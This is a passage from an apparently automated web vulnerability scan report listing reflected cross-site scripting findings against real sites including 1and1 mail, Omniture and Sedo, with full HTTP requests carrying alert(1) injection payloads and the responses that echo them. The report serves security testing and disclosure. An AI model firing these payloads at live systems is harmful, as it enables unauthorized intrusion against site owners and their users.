if (typeof(fd_clk) == 'undefined') {var fd_clk = '4dc72"><script>alert(1)</script>f885aaf88a2http://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=1447
...[SNIP]...
<a target="_blank" href="4dc72"><script>alert(1)</script>f885aaf88a2http://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=144706">
...[SNIP]...

2.4. https://mailxchange.1and1.com/ajax/login [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mailxchange.1and1.com
Path:   /ajax/login

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c33b9<script>alert(1)</script>6afa09c7826 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax/c33b9<script>alert(1)</script>6afa09c7826?action=autologin&modules=true&client=com.openexchange.ox.gui.dhtml&version=6.20.0%20Rev24 HTTP/1.1
Host: mailxchange.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://mailxchange.1and1.com/ox6/ox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:6:ChbXhwAAATPAbdpOyIFYlU2M8_MKRXjX:1318724228999; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15

Response

HTTP/1.1 404 Not Found
Date: Sun, 16 Oct 2011 00:18:43 GMT
Server: Apache/2.2.9
X-JK-ID: 1318716007-31889-5284
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 92

<html>No servlet bound to path/alias: /ajax/c33b9<script>alert(1)</script>6afa09c7826</html>

2.5. https://mailxchange.1and1.com/ajax/login [action parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://mailxchange.1and1.com
Path:   /ajax/login

Issue detail

The value of the action request parameter is copied into the HTML document as plain text between tags. The payload e350b<img%20src%3da%20onerror%3dalert(1)>6cc434dab0e was submitted in the action parameter. This input was echoed as e350b<img src=a onerror=alert(1)>6cc434dab0e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ajax/login?action=autologine350b<img%20src%3da%20onerror%3dalert(1)>6cc434dab0e&modules=true&client=com.openexchange.ox.gui.dhtml&version=6.20.0%20Rev24 HTTP/1.1
Host: mailxchange.1and1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://mailxchange.1and1.com/ox6/ox.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: emos_1und1_jcsid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:8:AAABMwoWMY2wZSfpx1gQT8DuGwTPeYom:1318724186509; emos_1und1_jcvid=AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1:AAABMwoSA2mejtbdrdpwx2E4voVDCFAQ:1318723912553:0:false:10; emos_jcsid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:6:ChbXhwAAATPAbdpOyIFYlU2M8_MKRXjX:1318724228999; emos_jcvid=ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1:ChRyAgAAATMab9XBc3FTw*Jce1qFXm9e:1318724071937:0:false:15

Response

HTTP/1.1 200 OK
Date: Sun, 16 Oct 2011 00:18:38 GMT
Server: Apache/2.2.9
Expires: Sat, 06 May 1995 12:00:00 GMT
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent,Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript; charset=UTF-8
Content-Length: 171

{"category":8,"error_params":["autologine350b<img src=a onerror=alert(1)>6cc434dab0e"],"error":"Unknown AJAX action: %s.","error_id":"1874720427-167926","code":"SVL-0001"}

2.6. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8ec62<script>alert(1)</script>4b069b5a65f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318726703775-697602&mboxPC=1318631777052-118529.19&mboxPage=1318726703775-697602&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=4&mbox=newhome_offer8ec62<script>alert(1)</script>4b069b5a65f&mboxId=0&mboxTime=1318708708770&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318726703775-697602; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627675715-101685.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 00:59:07 GMT; Path=/m2/omnituremarketing
Content-Type: text/javascript
Content-Length: 306
Date: Sun, 16 Oct 2011 00:59:06 GMT
Server: Test & Target

mboxFactories.get('default').get('newhome_offer8ec62<script>alert(1)</script>4b069b5a65f',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getCookieManager().setCookie("session","1318726761577-292972",1860);mboxFactories.get('default').getPCId().forceId("131862767
...[SNIP]...

2.7. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 71a79<img%20src%3da%20onerror%3dalert(1)>9cea6436f9d was submitted in the mbox parameter. This input was echoed as 71a79<img src=a onerror=alert(1)>9cea6436f9d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318726703775-697602&mboxPC=1318631777052-118529.19&mboxPage=1318726703775-697602&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event71a79<img%20src%3da%20onerror%3dalert(1)>9cea6436f9d&mboxId=0&mboxTime=1318708721314&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&eVar17=6%3A30PM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318726703775-697602; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627675715-101685.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 01:00:17 GMT; Path=/m2/omnituremarketing
Content-Length: 264
Date: Sun, 16 Oct 2011 01:00:16 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318627675715-101685.19");mboxFactories.get('default').get('SiteCatalyst: event71a79<img src=a onerror=alert(1)>9cea6436f9d', 0).setOffer(new mboxOfferDefault()).loaded();}

2.8. http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/sc/standard [mboxId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /m2/omnituremarketing/sc/standard

Issue detail

The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload e3302<script>alert(1)</script>df23f11db5e was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omnituremarketing/sc/standard?mboxHost=www.omniture.com&mboxSession=1318726703775-697602&mboxPC=1318631777052-118529.19&mboxPage=1318726703775-697602&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=9&mbox=SiteCatalyst%3A%20event&mboxId=0e3302<script>alert(1)</script>df23f11db5e&mboxTime=1318708721314&charSet=UTF-8&visitorNamespace=omnituremarketing&cookieLifetime=31536000&pageName=Omniture%3A%20Homepage&currencyCode=USD&channel=Home&server=www.omniture.com&events=event69&resolution=1920x1200&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cdoc%2Cpdf%2Cxls%2Czxp%2Cxlsx%2Cdocx%2Cmp4%2Cm4v&linkInternalFilters=javascript%3A%2C207%2C2o7%2Csitecatalyst%2Comniture%2Cwww.registerat.com%2Cthelink.omniture.com&linkTrackVars=None&linkTrackEvents=None&eVar3=Now%20Defined%20by%20Test%20and%20Target&eVar4=English&prop5=Now%20Defined%20by%20Test%20and%20Target&prop6=English&prop14=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&eVar17=6%3A30PM&eVar35=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40&scPluginVersion=1 HTTP/1.1
Host: omnituremarketing.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxSession=1318726703775-697602; mboxPC=1318631777052-118529.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627675715-101685.19; Domain=omnituremarketing.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 01:00:19 GMT; Path=/m2/omnituremarketing
Content-Length: 261
Date: Sun, 16 Oct 2011 01:00:19 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1318627675715-101685.19");mboxFactories.get('default').get('SiteCatalyst: event', 0e3302<script>alert(1)</script>df23f11db5e).setOffer(new mboxOfferDefault()).loaded();}

2.9. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6b48c<script>alert(1)</script>d37c751e8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318726709893-408414&mboxFactoryId=staging&mboxPC=1318631787015-280970.19&mboxPage=1318726709893-408414&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging6b48c<script>alert(1)</script>d37c751e8df&mboxId=0&mboxTime=1318708710034&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318627688287-996814.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 00:59:06 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 314
Date: Sun, 16 Oct 2011 00:59:06 GMT
Server: Test & Target

mboxFactories.get('staging').get('newhome_offer-staging6b48c<script>alert(1)</script>d37c751e8df',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('staging').getCookieManager().setCookie("session","1318726768507-362610",1860);mboxFactories.get('staging').getPCId().forceId("131862768
...[SNIP]...

2.10. http://omniturestaging.staging.tt.omtrdc.net/m2/omniturestaging/mbox/standard [mboxFactoryId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /m2/omniturestaging/mbox/standard

Issue detail

The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140f'%3balert(1)//810eef61a7b was submitted in the mboxFactoryId parameter. This input was echoed as 5140f';alert(1)//810eef61a7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /m2/omniturestaging/mbox/standard?mboxHost=www.omniture.com&mboxSession=1318726709893-408414&mboxFactoryId=staging5140f'%3balert(1)//810eef61a7b&mboxPC=1318631787015-280970.19&mboxPage=1318726709893-408414&screenHeight=1200&screenWidth=1920&browserWidth=1210&browserHeight=901&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=newhome_offer-staging&mboxId=0&mboxTime=1318708710034&mboxURL=http%3A%2F%2Fwww.omniture.com%2Fen%2F%250A%2522%253E%253Ca%253Exsssss%23mboxClick-newhome_persona%2Fpersona-offer-list%2FLI%2FP&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: omniturestaging.staging.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1318631787015-280970.19; s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1318631787015-280970.19; Domain=omniturestaging.staging.tt.omtrdc.net; Expires=Sun, 30-Oct-2011 00:59:04 GMT; Path=/m2/omniturestaging
Content-Type: text/javascript
Content-Length: 1212
Date: Sun, 16 Oct 2011 00:59:04 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('staging5140f';alert(1)//810eef61a7b').get('newhome_offer-staging',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImported-staging5140f';alert(1)//810eef61a7b-newhome_o
...[SNIP]...

2.11. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssss [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.omniture.com
Path:   /en/%0A%22%3E%3Ca%3Exsssss

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67e3"><a>922b46dfc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en/%0A%22%3E%3Ca%3Exsssssc67e3"><a>922b46dfc9f HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; mbox=PC#1318631777052-118529.19#1319897885|session#1318686440062-338730#1318690145|check#true#1318688345; mbox-staging=PC#1318631787015-280970.19#1319897892|session#1318686446356-232585#1318690152|check#true#1318688352; s_sv_p1=1@26@s/7243/7019/7341/6423&e/19

Response

HTTP/1.1 404 Not Found
Server: Omniture AWS/2.0.0
Last-Modified: Sun, 16 Oct 2011 00:58:07 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 48025
Cache-Control: public, max-age=14400
Expires: Sun, 16 Oct 2011 04:58:07 GMT
Date: Sun, 16 Oct 2011 00:58:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Adobe Online Marketing Suite po
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=%0A%22%3E%3Ca%3Exsssssc67e3"><a>922b46dfc9f&ignore_skin=0" />
...[SNIP]...

2.12. http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.omniture.com
Path:   /en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b34"><a>51370b9834b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f51b34"><a>51370b9834b HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; omniture_unique=5df950f7c6b3ef928e3cf0587caa37e2; mbox=PC#1318631777052-118529.19#1319936304|check#true#1318726764|session#1318726703775-697602#1318728564; mbox-staging=PC#1318631787015-280970.19#1319936310|check#true#1318726770|session#1318726709893-408414#1318728570; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=764644188291; s_sv_p1=1@26@s/7243/7019/7341/6423&e/20; s_sv_s1=1@16@a//1318726722012; BIGipServerhttp_omniture=101320202.5892.0000

Response

HTTP/1.1 404 Not Found
Server: Omniture AWS/2.0.0
Last-Modified: Sun, 16 Oct 2011 01:06:32 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
Vary: Accept-Encoding
xserver: www6.dmz
Content-Type: text/html; charset=utf-8
Content-Length: 48129
Cache-Control: public, max-age=14400
Expires: Sun, 16 Oct 2011 05:06:32 GMT
Date: Sun, 16 Oct 2011 01:06:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Adobe Online Marketing Suite po
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en&section=%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f51b34"><a>51370b9834b&ignore_skin=0" />
...[SNIP]...

2.13. http://www.sedo.com/rss/rss_list.php [country parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sedo.com
Path:   /rss/rss_list.php

Issue detail

The value of the country request parameter is copied into the HTML document as plain text between tags. The payload 384cb<a>8a75cc362dc was submitted in the country parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss/rss_list.php?rss_id=19&country=US384cb<a>8a75cc362dc&marketActivityPage=true&randomizeRefresh=true&language=us&partnerid=&_=1318724532195 HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:31 GMT
Server: Apache
Expires: Sun, 16 Oct 2011 00:22:31 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Content-Length: 675
Content-Type: application/xml;charset=UTF-8
X-Cache: MISS from 028224
Connection: keep-alive

<?xml version="1.0" encoding="UTF-8"?>
<!-- generator="FeedCreator 1.7.2" -->
<rss version="2.0">
<channel>
<title>-]RSS_SUBTITLE_SHOWCASE_CENTERED_US384CB&lt;A&gt;8A75CC362DC[-</title>

...[SNIP]...
<![CDATA[Featured Listings centered around the US384CB<A>8A75CC362DC]]>
...[SNIP]...

2.14. http://www.sedo.com/rss/rss_list.php [partnerid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sedo.com
Path:   /rss/rss_list.php

Issue detail

The value of the partnerid request parameter is copied into the HTML document as plain text between tags. The payload 6765b<a>552c8089353 was submitted in the partnerid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /rss/rss_list.php?rss_id=19&country=US&marketActivityPage=true&randomizeRefresh=true&language=us&partnerid=6765b<a>552c8089353&_=1318724532195 HTTP/1.1
Host: www.sedo.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.sedo.com/us/home/getting-started/?tracked=&partnerid=&language=us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookielanguage=us

Response

HTTP/1.0 200 OK
Date: Sun, 16 Oct 2011 00:22:38 GMT
Server: Apache
Expires: Sun, 16 Oct 2011 00:22:38 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
